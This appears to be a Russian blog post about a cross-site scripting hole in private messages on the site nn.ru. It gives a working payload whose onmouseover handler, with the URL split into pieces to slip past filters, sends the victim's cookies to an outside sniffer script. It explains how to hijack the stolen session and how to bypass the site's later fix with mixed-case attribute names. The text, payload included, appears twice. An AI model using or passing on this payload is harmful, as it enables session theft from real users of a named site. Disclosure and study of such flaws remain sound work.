nn.ru легко вскрывается
Программисты там нифига не фильтруют: атрибуты, стили и обработчики. Теги не прячут.
Пишем простейший сниффер-куков sniffer.php и вставляем вот такой текст на страницу-жертву:
<b style="display:block; width:80px; height:80px; background: url(imgurl);" onmouseover=" var d=document; pic = d.createElement('img'); pic.src='h'+'t'+'t'+'p'+':'+'/'+'/'+'e-ivanov.ru/sniffer.php'+'?cookie='+document.cookie; d.getElementsByTagName('body')[0].appendChild(pic); ">Поводите мышой тут</b>
В результате имеем сессию жертвы, подставляем в браузере через firebug и вуаля:
01.
Но это я так, ради экспериментов, нашло на меня шо то ((-:
Глюкаво пишут эти программисты в nn.ru...
ps.
а сами программисты вот что пишут:
Qavai
вы почему не фильтруете атрибуты, стили и обработчики событий в тегах в приватных сообщениях?
легко же вскрыть
Pashtet
Не понял?
Qavai
- послал ему хак
Pashtet
Ой мать!
Запарили совсем, не говорите н кому.
Qavai
ну так это же опасно.
я тоже могу пострадать
так и живём...
Продолжение истории:
Они ответили:
Это реальный косяк, спасибо, что подсказали
И исправили вроде. Стали резать опасные атрибуты. Просто резать - делить их на несколько кусков. При этом опасные данные остаются! Алгоритм я не понял. Например, style порезали на st yle. Написал stylestyle, порезали на st ylest yle.
Но я попробовал написать большими буквами - stYle - и всё опять запахало (-:
Мдя...мастеры-ломастеры
Пишем простейший сниффер-куков sniffer.php и вставляем вот такой текст на страницу-жертву:
<b style="display:block; width:80px; height:80px; background: url(imgurl);" onmouseover=" var d=document; pic = d.createElement('img'); pic.src='h'+'t'+'t'+'p'+':'+'/'+'/'+'e-ivanov.ru/sniffer.php'+'?cookie='+document.cookie; d.getElementsByTagName('body')[0].appendChild(pic); ">Поводите мышой тут</b>
В результате имеем сессию жертвы, подставляем в браузере через firebug и вуаля:
01.
Но это я так, ради экспериментов, нашло на меня шо то ((-:
Глюкаво пишут эти программисты в nn.ru...
ps.
а сами программисты вот что пишут:
Qavai
вы почему не фильтруете атрибуты, стили и обработчики событий в тегах в приватных сообщениях?
легко же вскрыть
Pashtet
Не понял?
Qavai
- послал ему хак
Pashtet
Ой мать!
Запарили совсем, не говорите н кому.
Qavai
ну так это же опасно.
я тоже могу пострадать
так и живём...
Продолжение истории:
Они ответили:
Это реальный косяк, спасибо, что подсказали
И исправили вроде. Стали резать опасные атрибуты. Просто резать - делить их на несколько кусков. При этом опасные данные остаются! Алгоритм я не понял. Например, style порезали на st yle. Написал stylestyle, порезали на st ylest yle.
Но я попробовал написать большими буквами - stYle - и всё опять запахало (-:
Мдя...мастеры-ломастеры